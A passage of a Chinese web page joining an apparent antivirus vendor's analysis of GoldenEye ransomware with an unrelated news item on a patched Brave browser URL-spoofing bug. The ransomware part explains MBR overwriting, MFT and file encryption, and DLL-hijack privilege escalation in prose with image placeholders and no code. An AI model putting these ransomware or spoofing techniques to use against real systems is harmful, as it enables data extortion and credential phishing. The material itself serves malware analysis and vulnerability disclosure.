首先解密出暗网的网址以及用户标识KEY,暗网网址+用户标识Hash的前8位就是用户支付赎金的网址。

11.png

图11  GoldenEye暗网网址的相关生成算法

然后通过VerifyVersionInfoW(系统版本)以及GetTokenInformation(管理员权限)来决定执行流程,如果拥有管理员权限则执行Petya,否则执行Mischa。

通过硬盘物理序列会生成两个hash字符串,作为互斥量的名称。

互斥量的作用是为了防止同一加密流程被重复执行。

12.png

图12  判断执行流程

五、 Petya模块

13.jpg

图13  Petya执行流程

Petya通过向MBR写入数据并调用NtRaiseHardError强制重启来触发加密流程。

14.png

图14  Petya部分写入MBR以及强制重启的关键代码

petya感染之后恶意数据在系统磁盘的分布如下:

15.jpg

图15  Petya感染后扇区布局

其中0×20扇区写入的是配置文件,里面包含Salsa20的相关密钥。

16.png

图16  Petya配置信息

其中Salsa20的加密Key会在加密后抹去,IV向量保持不变。

17.png

图17  清除Salsa20的加密Key

0×22保存着是加密过的原始MBR,Petya会通过其定位MFT表,然后进行加密,每次加密2个扇区,并且每加密0×40个扇区时会更新进度条。

18.png

图18  加密MFT关键代码

老版本的Petya使用了简化的Salsa20算法来加密MFT(主文件表),存在暴力破解密钥的漏洞,所以新版本的Petya修复暴力破解的漏洞,并提升了Salsa20的算法强度,密码的长度验证扩充为32字节。

19.png

图19  密码的长度验证

Salsa20用输入的key对0×21扇区进行解密后,如果解密后的数据都为0×7则表示验证通过。

20.png

图20  对0×21扇区数据进行验证

Petya只会针对分区格式为MBR且文件系统为NTFS的MFT(主文件表)进行加密,否则只修改MBR,显示黄色骷髅头,这就意味着我们可以通过直接修复MBR来恢复系统。因为Petya只对MFT表进行加密,并不加密文件内容,所以我们也可以直接通过相关的分区工具直接对文件进行恢复。

21.png

图21  判断磁盘分区格式

22.png

图22  判断文件系统格式

六、 Mischa模块

23.jpg

图23  Mischa模块基本流程图

从代码中我们可以看出Mischa能够加密硬盘以及可移动磁盘。

24.png

图24遍历硬盘和可移动磁盘

加密以下固定后缀的文件:

25.png

图25  加密文件的后缀

MisCha会对文件大小进行判断,如果文件大于32MB,只加密5MB大小的数据。

26.png

图26  判断文件大小

Mischa的文件名由原始文件名和用户标识Key的前8位组成:

27.png

图27  修改文件名

Mischa使用AES256算法对文件内容进行加密,每次加密0×400字节。对于每一个需要加密的文件来说,AES256的KEY是固定不变的,唯一不同的是随机生成的IV向量。

28.png

图28  加密文件内容

对文件加密完成后,会在文件末尾写入长度为0×76字节的解密相关的配置信息。

29.png

图29配置信息的内存布局

最后释放YOUR_FILES_ARE_ENCRYPTED.TXT,提醒用户文件已被加密。

值的一提的是,当Mischa加密完成之后, GoldenEye并没有善罢甘休,重新执行Petya流程,对MFT进行加密。

在高版本的系统中,读写MBR需要管理员权限,所以GoldenEye就会利用xxxx区段解密出的elevate_x86.dll/elevate_x64.dll进行提权,从而顺利的执行Petya。

提权的原理主要是通过查找系统白名单文件,对其进行dll劫持实现的。

30.png

图30  DLL劫持后的入口点代码

31.png

图31 重新执行GoldenEye

七、 GoldenEye勒索提示

恶意代码执行完之后就开始强制重启电脑,进行勒索提示:

32.png

图32  GoldenEye木马勒索提示画面

GoldenEye木马的赎金为1.3个比特币,且勒索方式相比Petya显得温和的多,不再因错过截止时间就翻倍赎金。GoldenEye木马会对输入的加密串进行简单的校验,如果出现大小写错误或者其他错误都会提示,直至输入正确的数据。

33.png

图33  提示输入识别码

输入正确的识别码之后提示用户勒索赎金的金额。

34.png

图34  提示比特币数额

最后提供支付赎金的账户。

35.png

图35  提示比特币收款账户

八、 360杀毒可以完美查杀

GoldenEye主要通过发送“求职垃圾邮件”的形式进行传播,并引诱受害者点击其中包含的恶意附件。首个附件是一个PDF文档,它将自己伪装成一封正经的求职信,而后还跟着一个包含了宏恶意软件的Excel文档。提醒广大网友:重要数据应定期备份。此外,他人发来的可疑程序或脚本(如exe、scr、js等)不要双击运行,这样就能最大限度的避免中招。

36.png

中国骇客云0day最新漏洞~Brave浏览器被曝安全漏洞:黑客可伪造网址欺骗用户

作为一款开源软件,Brave一直以广告拦截,防cookie追踪、像素追踪等安全特性著称。产品安全一直被开发者视为重中之重,他们在Hackerone平台就开设了bug有奖征集项目,鼓励广大的网络安全人士参与到提高产品可靠性的活动中来。

本次漏洞正是由安全研究人员Aaditya Purani在Hackerone平台上首先披露的。他发现攻击者可以利用浏览器漏洞伪造网页进行网址欺骗,一旦用户点击访问就可能泄漏个人信息,攻击者更可以在虚假页面上实施挂马和钓鱼等行为。

简而言之,受害者看到地址栏里还是熟悉的网址,但页面内容却是由黑客控制的。

“我们本以为地址栏已经是唯一信得过的安全提示了”,许多公司这样感叹道。

重现漏洞

下面是Purani 如何操作的:

首先他写了一个网址来伪造Brave浏览器地址栏(bravespoof.html)。为了模拟受害者环境,他还在这个网址里包含了一个要求用户提供登录名和密码的表单。接下来的关键在于,他使用函数f()指向https://facebook.com,并且设定setInterval函数每10ms执行一次f()。

通常情况下,这种做法会使得用户访问该网址时,URL和页面内容每隔10ms都会跳转到https://facebook.com(当然也有时无论URL或页面都没有任何跳转,但这两种情况显然都是安全的)。但是Purani发现,当使用Brave浏览器访问上述地址时,事情却没有这么简单。事实上,无论你通过Android还是IOS的Brave客户端去访问他构造好的网址,URL都会跳转到https://facebook.com(你可以看到甚至还有绿锁安全认证),但页面却还是Purani预先写好的内容。

这就意味着,某个习惯通过地址栏来判断安全性的用户很可能不经意间就把帐号密码泄漏给了虚假页面之后的黑客。(当然了黑客需要把网页做的更逼真一些:P)

brave-ios-hack.jpg

其他浏览器反应如何?

在Purani对Chrome的测试中,浏览器并没有更改URL到https://facebook.com,而是依旧停留在他伪造的网址上。Mozilla也给出了同样反应。但最让Purani满意的还是UC Mini(安卓平台)——无论网址还是页面都直接跳转到了https://facebook.com,将攻击消弭于无形。当然了,Safari也没有受此影响。

如果你对完整漏洞报告感兴趣,戳这里

没错,在他的一系列测试中,只有Brave悲剧了。受此漏洞影响的版本如下:

IOS Version 1.2.16(16.09.30.10)

Android Version 1.9.56

如果看到这里的你正使用上述受到影响的版本…也不用担心,因为这份漏洞报告是直到3个月后(的今天)才被公布出来的,而Brave安全团队早已于发现一周内修复了这个问题,因此暂无负面影响。

当然,好处还是有的——Purani本人因此获得了200$的奖金。在此之前Purani也曾向一众企业和机构提交多起高危安全漏洞,如WordPress Mobile Detector插件漏洞等。白帽子和安全平台的合作不仅协助了众多中小企